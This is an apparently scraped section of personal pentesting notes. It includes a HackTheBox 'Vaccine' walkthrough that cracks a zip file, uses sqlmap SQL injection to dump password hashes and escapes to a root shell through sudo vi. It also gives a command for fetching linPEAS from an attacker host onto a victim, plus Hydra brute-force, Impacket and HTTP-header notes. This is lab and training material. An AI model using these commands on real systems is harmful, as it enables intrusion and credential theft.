################\n# On the attacker machine\n###############\n# Download the script from the release page (-L follows redirects, -O keeps the file name)\ncurl -LO https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh\n\n# Copy the file to the root of your apache server\ncp linpeas.sh /var/www/html\n\n# Start your server \nservice apache2 start\n# Turn it off once you have served your file\n\n################\n# From the victim machine\n################\n# Download the script from the attacker server\nwget http://attackerIP/linpeas.sh\n\n# Run the script\nchmod +x linpeas.sh\n./linpeas.sh\n
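As a lighter alternative to Apache, Python's built-in web server can serve the file just as well (a sketch; run it from the directory containing linpeas.sh, and note that binding port 80 requires root):

sudo python3 -m http.server 80\n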

                        Some interesting takeaways from the linpeas.sh results:

                        ","tags":["walkthrough"]},{"location":"htb-vaccine/","title":"Vaccine - A HackTheBox machine","text":"

                        nmap -sC -sV $ip -Pn\n
                        Two open ports: 21 and 80

Also, from the nmap analysis, the ftp service on port 21 allows anonymous sign-in with an empty password:

                        ftp $ip\n\n# enter user \"anonymous\" and hit enter when prompted for password\n
dir\n# the listing shows the file backup.zip\n\nget backup.zip\n

We try to open the zip file, but it's password protected, so we crack it with John the Ripper:

                        zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n# Proceeding with wordlist:/usr/share/john/password.lst\n# 741852963        (backup.zip)    \n\n\n#Unzip file:\nunzip backup.zip\n\n# Echo index file\ncat index.php\n

Before the HTML code there is a piece of PHP starting the session. The username and password hash are hard-coded there:

                        <?php\nsession_start();\n  if(isset($_POST['username']) && isset($_POST['password'])) {\n    if($_POST['username'] === 'admin' && md5($_POST['password']) === \"2cb42f8734ea607eefed3b70af13bbd3\") {\n      $_SESSION['login'] = \"true\";\n      header(\"Location: dashboard.php\");\n    }\n  }\n?>\n

In crackstation.net, we find that the hash \"2cb42f8734ea607eefed3b70af13bbd3\" is an MD5 hash and that the actual password is \"qwerty789\".
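Had the online lookup failed, the hash could also be attacked offline; a sketch with hashcat (mode 0 is raw MD5; the rockyou wordlist path is the Kali default):

echo \"2cb42f8734ea607eefed3b70af13bbd3\" > hash.txt\nhashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt\n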

With this, open the browser and enter the username and password. You will be redirected to: http://$ip/dashboard.php

The search box triggers an error message on the frontend when a single quotation mark \"'\" is introduced as input:

                         ERROR: unterminated quoted string at or near \"'\" LINE 1: Select * from cars where name ilike '%'%' ^\n

This points to a SQL injection vulnerability.

                        # Ask for backend DBMS\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch      \n\n#---------\n# [11:03:27] [INFO] the back-end DBMS is PostgreSQL\n#web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)\n#web application technology: Apache 2.4.41\n#back-end DBMS: PostgreSQL\n\n\n\n# Ask for databases\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --dbs\n\n# ------\n# [11:06:12] [INFO] fetching database (schema) names available databases [3]:\n# [*] information_schema\n# [*] pg_catalog\n# [*] public\n\n\n\n# Ask for tables in db pg_catalog\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog --tables\n\n# Response contains 62 tables. \n\n\n# Ask for users\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --users \n\n# -----\n# [11:10:16] [INFO] resumed: 'postgres'\n# database management system users [1]:\n# [*] postgres\n\n\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog -T pg_user -C passwd,usebypassrls,useconfig,usecreatedb,usename,userepl,usesuper,usesysid,valuntil --dump\n\n\n\n# Ask for passwords\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --passwords --dump\n\n# -----\n# database management system users password hashes:\n# [*] postgres [1]:\n#    password hash: md52d58e0637ec1e94cdfba3d1c26b67d01\n

The first three characters are a hint about the hash type. Using https://md5.gromweb.com/?md5=2d58e0637ec1e94cdfba3d1c26b67d01 we obtain: The MD5 hash 2d58e0637ec1e94cdfba3d1c26b67d01 was successfully reversed into the string: P@s5w0rd!postgres

Now, as we couldn't spot port 5432 (postgres) open, we will use SSH port forwarding.

ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client forwards the connection to the remote server, which delivers it to port 5432 on its own localhost. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from a given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n\nssh postgres@10.129.95.174 -L 1234:localhost:5432\n
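With the tunnel up, the database is reachable through the forwarded local port; a sketch connecting with psql (it will prompt for the P@s5w0rd!postgres password recovered above):

psql -h localhost -p 1234 -U postgres\n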

                        After this, we can \"cat\" the user.txt file.

To escalate privileges, we first run some commands for basic reconnaissance:

                        whoami\nid\nsudo -l\n

The last one provides us with interesting output:

                        User postgres may run the following commands on vaccine:\n    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf\n

We can abuse the sudo-permitted vi binary to spawn a shell as root:

                         sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf\n:set shell=/bin/sh\n:shell\n

                        Once there, print out root flag:

                        cat /root/root.txt\n
                        ","tags":["walkthrough"]},{"location":"http-headers/","title":"HTTP headers","text":"Tools
                        • Curl

                        HTTP (Hypertext Transfer Protocol) is a stateless application layer protocol used for the transmission of resources like web application data and runs on top of TCP.

                        It was specifically designed for communication between web browsers and web servers.

                        HTTP utilizes the typical client-server architecture for communication, whereby the browser is the client, and the web server is the server.

                        Resources are uniquely identified with a URL/URI.

HTTP has several versions: HTTP/1.0, HTTP/1.1 and HTTP/2, with HTTP/3 now rolling out.

• HTTP/1.1 is the most widely used version of HTTP and has several advantages over HTTP/1.0, such as the ability to re-use the same TCP connection (taking advantage of the 3-way handshake already performed) and to request multiple URIs/resources over that connection.
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-request","title":"Structure of a HTTP request","text":"

                        Request Line: The request line is the first line of an HTTP request and contains the following three components:

                        HTTP method (e.g., GET, POST, PUT, DELETE, etc.): Indicates the type of request being made.\nURL (Uniform Resource Locator): The address of the resource the client wants to access.\nHTTP version: The version of the HTTP protocol being used (e.g., HTTP/1.1).\n

                        Request Headers: they provide additional information about the request. Common headers include:

                        User-Agent: Information about the client making the request (e.g., browser type).\nHost: The hostname of the server.\nAccept: The media types the client can handle in the response (e.g., HTML, JSON).\nAuthorization: Credentials for authentication, if required.\nCookie: Information stored on the client-side and sent back to the server with each request.\n
                        GET /home/ HTTP/2\nHost: site.com\nCookie: session=cookie-value-00000-00000\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nDnt: 1\nSec-Gpc: 1\n

                        Request Body (Optional): Some HTTP methods (like POST or PUT) include a request body where data is sent to the server, typically in JSON or form data format.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#http-verbs-or-methods","title":"HTTP verbs (or methods)","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-response","title":"Structure of a HTTP response","text":"

                        Response headers: Similar to request headers, response headers provide additional information about the response. Common headers include:

                        Content-Type: The media type of the response content (e.g., text/html, application/json).\nContent-Length: The size of the response body in bytes.\nSet-Cookie: Used to set cookies on the client-side for subsequent requests.\nCache-Control: Directives for caching behavior.\n

                        Response Body (Optional): The response body contains the actual content of the response. For example, in the case of an HTML page, the response body will contain the HTML markup.

                        In response to the HTTP Request, the web server will respond with the requested resource, preceded by a bunch of new HTTP response headers. These new response headers from the web server will be used by your web browser to interpret the content contained in the Response content/body of the response.

                        An example:

                        HTTP/1.1 200 OK\nDate: Fri, 13 Mar 2015 11:26:05 GMT\nCache-Control: private, max-age=0\nContent-Type: text/html; charset=UTF-8\nContent-Encoding: gzip\nServer: gws\nContent-Length: 258\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#date-header","title":"Date header","text":"

                        The \"Date\" header in an HTTP response is used to indicate the date and time when the response was generated by the server. It helps clients and intermediaries to understand the freshness of the response and to synchronize the time between the server and the client. This is used in a blind SQLinjection, to see how long it takes for the server to respond.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#status-code","title":"Status code","text":"

The status codes can be summarized in the following chart:

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#content-type","title":"Content-Type","text":"

                        The \"Content-Type\" header in an HTTP response is used to indicate the media type of the response content. It tells the client what type of data the server is sending so that the client can handle it appropriately.

                        List of all content-type headers

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cache-control","title":"Cache-control","text":"

Cache-Control is a header used to specify caching policies for browsers and other caching services. Specifically, the Cache-Control HTTP header field holds directives (instructions), in both requests and responses, that control caching in browsers and shared caches (e.g. proxies, CDNs).

Why is this configuration considered safe? Cache-control: no-store, no-cache, max-age=0.
• The max-age=N response directive indicates that the response remains fresh until N seconds after the response is generated.
• The no-cache response directive indicates that the response can be stored in caches, but must be validated with the origin server before each reuse, even when the cache is disconnected from the origin server.
• The no-store response directive indicates that caches of any kind (private or shared) should not store this response.
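To verify what a given server actually sends, one can inspect the response headers; a minimal sketch with curl (-I fetches headers only; the URL is a placeholder):

curl -sI https://example.com/ | grep -i cache-control\n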

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#server-header","title":"Server header","text":"

                        The Server header displays the Web Server banner, for example, Apache, Nginx, IIS etc. Google uses a custom web server banner: gws (Google Web Server).

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#set-cookie","title":"Set-Cookie","text":"

                        From geeksforgeeks: \"The\u00a0HTTP header Set-Cookie\u00a0is a response header and used to send cookies from the server to the user agent. So the user agent can send them back to the server later so the server can detect the user.\"

                        # The cookie name have to avoid this character ( ) @, ; : \\ \u201d / [ ] ? = { } plus control characters, spaces, and tabs. It can be any US-ASCII characters.\nSet-Cookie: <cookie-name>=<cookie-value>\n\n# This directive defines the host where the cookie will be sent. It is an optional directive.\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>\n\n# It is an optional directive that contains the expiry date of the cookie.\nSet-Cookie: <cookie-name>=<cookie-value>; Expires=<date>\n\n# Forbids JavaScript from accessing the cookie, for example, through the\u00a0`Document.cookie`\u00a0property. Note that a cookie that has been created with\u00a0`HttpOnly`\u00a0will still be sent with JavaScript-initiated requests, for example, when calling\u00a0`XMLHttpRequest.send()`\u00a0or\u00a0`fetch()`. This mitigates attacks against cross-site scripting XSS.\nSet-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n\n# It contains the life span in a digit of seconds format, zero or negative value will make the cookie expired immediately.\nSet-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Partitioned\n\n# This directive define a path that must exist in the requested URL, else the browser can\u2019t send the cookie header.\nSet-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Secure\n\n# This directives providing some protection against cross-site request forgery attacks.\n# Strict means that the browser sends the cookie only for same-site requests, that is, requests originating from the same site that set the cookie. If a request originates from a different domain or scheme (even with the same domain), no cookies with the\u00a0`SameSite=Strict`\u00a0attribute are sent.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Strict\n\n# Lax means that the cookie is not sent on cross-site requests, such as on requests to load images or frames, but is sent when a user is navigating to the origin site from an external site (for example, when following a link). This is the default behavior if the\u00a0`SameSite`\u00a0attribute is not specified.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Lax\n\n# means that the browser sends the cookie with both cross-site and same-site requests. The\u00a0`Secure`\u00a0attribute must also be set when setting this value, like so\u00a0`SameSite=None; Secure`\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=None; Secure\n\n// Multiple attributes are also possible, for example:\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#understanding-samesite-attribute","title":"Understanding SameSite attribute","text":"

                        Differences between SameSite and SameOrigin: we will use the URL\u00a0http://www.example.org\u00a0 to see the differences more clearly.

| URL | Description | same-site | same-origin |\n|---|---|---|---|\n| http://www.example.org | Identical URL | \u2705 | \u2705 |\n| http://www.example.org:80 | Identical URL (implicit port) | \u2705 | \u2705 |\n| http://www.example.org:8080 | Different port | \u2705 | \u274c |\n| http://sub.example.org | Different subdomain | \u2705 | \u274c |\n| https://www.example.org | Different scheme | \u274c | \u274c |\n| http://www.example.evil | Different TLD | \u274c | \u274c |

                        When thinking about\u00a0SameSite\u00a0cookies, we're only thinking about \"same-site\" or \"cross-site\".

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cors-cross-origin-resource-sharing","title":"CORS - Cross-Origin Resource Sharing","text":"

                        Cross-Origin Resource Sharing\u00a0(CORS) is an\u00a0HTTP-header based mechanism that allows a server to indicate any\u00a0origins\u00a0(domain, scheme, or port) other than its own from which a browser should permit loading resources.

                        For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#x-xss-protection","title":"X-XSS-Protection","text":"

                        The HTTP\u00a0X-XSS-Protection\u00a0response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting XSS attacks.

                        Syntax

                        # Disables XSS filtering.\nX-XSS-Protection: 0\n\n# Enables XSS filtering (usually default in browsers). If a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).\nX-XSS-Protection: 1\n\n# Enables XSS filtering. Rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.\nX-XSS-Protection: 1; mode=block\n\n# Enables XSS filtering. If a cross-site scripting attack is detected, the browser will sanitize the page and report the violation. This uses the functionality of the CSP report-uri\u00a0directive to send a report.\nX-XSS-Protection: 1; report=<reporting-uri>\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#strict-transport-security","title":"Strict-Transport-Security","text":"

                        The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) informs browsers that the site should only be accessed using HTTPS, and that any future attempts to access it using HTTP should automatically be converted to HTTPS.

                        Directives

                        # The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.\nmax-age=<expire-time>\n\n# If this optional parameter is specified, this rule applies to all of the site's subdomains as well.\nincludeSubDomains \n

                        Example:

                        Strict-Transport-Security: max-age=31536000; includeSubDomains\n

                        Additionally, Google maintains an HSTS preload service (used also by Firefox and Safari). By following the guidelines and successfully submitting your domain, you can ensure that browsers will connect to your domain only via secure connections. While the service is hosted by Google, all browsers are using this preload list. However, it is not part of the HSTS specification and should not be treated as official. Directive for the preload service is:

                        # When using preload, the max-age directive must be at least 31536000 (1 year), and the includeSubDomains directive must be present.\npreload\n

                        Sending the\u00a0preload\u00a0directive from your site can have\u00a0PERMANENT CONSEQUENCES\u00a0and prevent users from accessing your site and any of its subdomains if you find you need to switch back to HTTP.

                        What OWASP says about HSTS response header.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#exploitation","title":"Exploitation","text":"

                        Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look\u00a0here\u00a0for more details.

Cookies can be manipulated from sub-domains, so omitting the includeSubDomains option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the secure flag is set on all cookies will also prevent some, but not all, of the same attacks.

                        So... basically HSTS addresses the following threats:

                        • User bookmarks or manually types\u00a0http://example.com\u00a0and is subject to a man-in-the-middle attacker: HSTS automatically redirects HTTP requests to HTTPS for the target domain.
• Web application that is intended to be purely HTTPS inadvertently contains HTTP links or serves content over HTTP: HSTS automatically redirects HTTP requests to HTTPS for the target domain.
                        • A man-in-the-middle attacker attempts to intercept traffic from a victim user using an invalid certificate and hopes the user will accept the bad certificate: HSTS does not allow a user to override the invalid certificate message
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#https","title":"HTTPS","text":"

                        HTTPS (Hypertext Transfer Protocol Secure) is a secure version of the HTTP protocol, which is used to transmit data between a user's web browser and a website or web application.

                        HTTPS provides an added layer of security by encrypting the data transmitted over the internet, making it more secure and protecting it from unauthorized access and interception.

                        HTTPS is also commonly referred to as HTTP Secure. HTTPS is the preferred way to use and configure HTTP and involves running HTTP over SSL/TLS.

                        SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols used to provide secure communication over a computer network, most commonly the internet. They are essential for establishing a secure and encrypted connection between a user's web browser or application and a web server.

HTTPS does not protect against web application flaws! Attacks such as XSS and SQLi will still work regardless of the use of SSL/TLS.

The added encryption layer only protects data exchanged between the client and the server; it does not stop attacks against the web application itself.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#tools","title":"Tools","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#security-headers","title":"Security Headers","text":"
                        • https://securityheaders.com/
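Besides the online checker, you can do a quick local check with curl (a minimal sketch; example.com is a placeholder for your target):

curl -s -I https://example.com | grep -iE "strict-transport-security|x-frame-options|x-xss-protection|x-content-type-options|content-security-policy"\n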
                        ","tags":["pentesting HTTP headers"]},{"location":"httprint/","title":"httprint - A web server fingerprinting tool","text":"

                        httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

                        httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc.

httprint -P0 -h <target hosts> -s <signature file>\n# -P0: avoid pinging the host\n# -h: target host\n# -s: signature file to use\n
                        ","tags":["pentesting","enumeration","server enumeration","web server","fingerprinting"]},{"location":"httrack/","title":"HTTrack - A tool for mirrowing sites","text":"

                        HTTrack is a free (GPL, libre/free software) offline browser utility that allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

                        HTTrack arranges the original site's relative link-structure. Simply open a page of the \"mirrored\" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#installation","title":"Installation","text":"

                        Link to the project: https://www.httrack.com/.

                        sudo apt-get install httrack\n
                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#basic-usage","title":"Basic usage","text":"

Create a folder into which to mirror your target site.

                        mkdir targetsite\nhttrack domain.com  targetsite/\n

                        Interactive mode:

                        httrack\n
                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"hugo/","title":"Hugo","text":""},{"location":"hugo/#install-hugo","title":"Install Hugo","text":"
                        sudo apt-get install hugo\n
                        "},{"location":"hugo/#hugo-basic-commands","title":"Hugo basic commands","text":"

Go to your project folder and create a new site:

                        hugo new site <name-project>\n

                        Initialize the repo

                        git init\n

Launch the Hugo server so you can open the site at http://localhost:1313:

                        hugo server\n

Create new content, for instance:

                        • A new chapter:
                        hugo new --kind chapter hugo/_index.md\n
                        • A new entry:
                        hugo new hugo/quick_start.md\n
                        "},{"location":"hydra/","title":"Hydra","text":"

Hydra can attack nearly 50 services including Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses a dedicated module for each protocol.

                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#basic-commands","title":"Basic commands","text":"
# Main syntax:\nhydra -L users.txt -P pass.txt <service://server> <options>\n\n# Get information about a module\nhydra -U rdp\n\n# Attack a Telnet service\nhydra -L users.txt -P pass.txt telnet://target.server\n\n# Attack an SSH service\nhydra -L user.list -P password.list ssh://$ip\n\n# Attack RDP on 3389\nhydra -L user.list -P password.list rdp://$ip\n\n# Attack samba\nhydra -L user.list -P password.list smb://$ip\n\n# Attack a web resource\nhydra -L users.txt -P pass.txt http-get://localhost/\n# -l: specify a login name\n# -L: specify a list of login names\n# -p: specify a single password\n# -P: specify a file with passwords\n# -C: specify a file with user:password pairs\n# -t: how many parallel connections to run when cracking\n# -V: verbose\n# -f: stop the attack after finding a valid password\n# -M: list of servers to attack, one entry per line, ':' to specify port\n\n# To see the syntax of the http-get and http-post-form modules:\nhydra -U http-post-form\n# This will return:\n#    <url>:<form parameters>:<condition string>[:<optional>[:<optional>]]\n#    Example: "/login.php:userin=^USER^&passin=^PASS^:incorrect"\n#    It performs the attack against the login.php page. It uses the form input named userin (retrieve the actual name from the HTML code of the form) to inject the user dictionary, and the form input named passin to inject the password dictionary. The word incorrect is used to detect a failed login (observe the web application's behaviour to pick a suitable word). For example:\nhydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success"\n\n# Example for FTP on a non-default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#real-life-examples","title":"Real-life examples","text":"
hydra crack.me http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credential" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f\n\nhydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V\n\nhydra -l student -P /usr/share/wordlists/rockyou.txt ssh://192.153.213.3\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"i3/","title":"i3 - A windows management tool","text":"

Some useful resources:
• Tips from an experienced user: https://www.reddit.com/r/i3wm/comments/zjq8yf/some_tips_on_how_to_take_advantage_of_i3wm/
• https://github.com/cknadler/vim-anywhere
• https://i3wm.org/docs/userguide.html

                        "},{"location":"i3/#config-file","title":"Config file","text":"

                        Located at ~/.config/i3/config

                        You can add your own configurations.

                        "},{"location":"i3/#quick-guide","title":"Quick guide","text":"
# Open a terminal window. By default it will open horizontally\n$mod+Enter\n\n# Split vertically for the next window\n$mod+v\n\n# Split horizontally for the next window\n$mod+h\n\n# Select your parent container. With a selection of containers you can act on all of them at once, e.g. close them\n$mod+a\n\n# Move the position of the tiled windows\n$mod+Shift+Arrows // and move the windows around\n\n# Close a window\n$mod+Shift+Q\n\n# Enter full-screen mode\n$mod+f\n\n# Switch workspace\n$mod+num // To switch to workspace 2: $mod+2\n\n# Move a window to a workspace\n$mod+Shift+num // where num is the target workspace\n\n# Restart i3\n$mod+Shift+r\n\n# Exit i3\n$mod+Shift+e\n
                        "},{"location":"i3/#customization","title":"Customization","text":""},{"location":"i3/#locking-screen","title":"Locking screen","text":"

                        In my case I've added a shortcut to lock the screen:

                        # keybinding to lock screen\nbindsym $mod+Control+l exec \"i3lock -c 000000\"\n

This requires the tools i3lock (usually already installed) and xautolock (not preinstalled):

                        sudo apt install i3lock xautolock\n
                        "},{"location":"i3/#scratchpad","title":"Scratchpad","text":"

Also, I've added scratchpad shortcuts:

                        # Make the currently focused window a scratchpad\nbindsym $mod+Shift+space move scratchpad\n\n# Show the first scratchpad window\nbindsym $mod+space scratchpad show\n
                        "},{"location":"impacket-ntlmrelayx/","title":"ntlmrelayx - a module from Impacket","text":"","tags":["pentesting","smb"]},{"location":"impacket-ntlmrelayx/#installation","title":"Installation","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
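A basic usage sketch (assuming SMB signing is disabled on the targets; targets.txt is a hypothetical file listing the hosts to relay the captured authentication to):

python3 ntlmrelayx.py -tf targets.txt -smb2support\n# -tf: file with target hosts to relay the captured authentication to\n# -smb2support: add SMB2 support to the rogue server\n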

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/","title":"Impacket PsExec","text":"

PsExec uploads a service binary to the target's ADMIN$ share and registers it as a Windows service. The PsExec service then creates a named pipe that can send commands to the system.

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#installation","title":"Installation","text":"

Download from: Impacket PsExec.

                        ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#basic-commands","title":"Basic commands","text":"
                        # Get help \nimpacket-psexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n
                        ","tags":["pentesting","smb"]},{"location":"impacket-smbexec/","title":"Impacket SMBExec","text":"

                        Impacket SMBExec\u00a0- A similar approach to PsExec without using\u00a0RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.

                        ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#installation","title":"Installation","text":"

Download from: Impacket SMBExec.

                        ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#basic-commands","title":"Basic commands","text":"
                        # Get help \nimpacket-smbexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n
                        ","tags":["pentesting","windows"]},{"location":"impacket/","title":"Impacket - A python tool for network protocols","text":"","tags":["pentesting","windows"]},{"location":"impacket/#what-for","title":"What for?","text":"

                        Impacket is a collection of Python classes for working with network protocols. For instance:

                        • Ethernet, Linux \"Cooked\" capture.
                        • IP, TCP, UDP, ICMP, IGMP, ARP.
                        • IPv4 and IPv6 Support.
                        • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
                        • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
                        • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
                        • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
                        • Portions of TDS (MSSQL) and LDAP protocol implementations.
                        ","tags":["pentesting","windows"]},{"location":"impacket/#installation","title":"Installation","text":"
                        git clone https://github.com/SecureAuthCorp/impacket.git\ncd impacket\npip3 install .\n\n# OR:\nsudo python3 setup.py install\n\n# In case you are missing some modules:\npip3 install -r requirements.txt\n\n# In case you don't have pip3 (pip for Python3) installed, or Python3, install it with the following commands\nsudo apt install python3 python3-pip\n
                        ","tags":["pentesting","windows"]},{"location":"impacket/#basic-tools-included","title":"Basic tools included","text":"
                        • samrdump
                        • smbserver
                        • PsExec
                        ","tags":["pentesting","windows"]},{"location":"index-linux-privilege-escalation/","title":"Index for Linux Privilege Escalation","text":"Guides to have at hand
                        • HackTricks. Written by the creator of WinPEAS and LinPEAS.
                        • Vulnhub PrivEsc Cheatsheet.
                        • s0cm0nkey's Security Reference Guide.

This is a nice summary related to Local Privilege Escalation by @s4gi_.

                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"

                        Some basic commands once you have gained access to a Linux machine:

# Current user\nwhoami\n\n# Current working directory\npwd\n\n# User and group IDs\nid\n\n# Kernel version and architecture\nuname -a\n\n# Distribution release details\nlsb_release -a\n
                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

                        Enumeration scripts

• Scan the Linux system with "LinEnum".
• Search for possible paths to escalate privileges with "LinPEAS".
• Enumerate privileges with the "Linux Privilege Checker" tool.
• Enumerate possible exploits with the "Linux Exploit Suggester" tool.
                        ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

                        Techniques

• Cron jobs: path, wildcards, file overwrite.
• Daemons.
• Dirty COW.
• File Permissions:
  • Configuration files.
  • Startup scripts.
  • Process capabilities: getcap.
  • SUID binaries: shared object injection, symlink, environmental variables.
  • LXD privilege escalation.
• Kernel vulnerability exploitation.
• LD_PRELOAD / LD_LIBRARY_PATH.
• NFS.
• Password Mining: logs, memory, history, configuration files.
• Sudo: shell escape sequences, abuse of intended functionality.
• SSH keys.
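A few quick manual checks covering several of these vectors (a minimal sketch; paths are the usual defaults):

# SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# File capabilities\ngetcap -r / 2>/dev/null\n\n# System-wide cron jobs\ncat /etc/crontab; ls -la /etc/cron.*\n\n# Sudo rights for the current user\nsudo -l\n\n# NFS exports (look for no_root_squash)\ncat /etc/exports\n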
                        ","tags":["privilege escalation"]},{"location":"index-windows-privilege-escalation/","title":"Index for Windows Privilege Escalation","text":"Guides to have at hand
                        • HackTricks. Written by the creator of WinPEAS and LinPEAS.
                        • Vulnhub PrivEsc Cheatsheet.
                        • s0cm0nkey's Security Reference Guide.

This is a nice summary related to Local Privilege Escalation by @s4gi_.

                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

                        Enumeration scripts

                        • Windows Privilege Escalation Awesome Scripts: winPEAS tool.
                        • Seatbelt.
                        • JAWS.
                        ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

                        Techniques

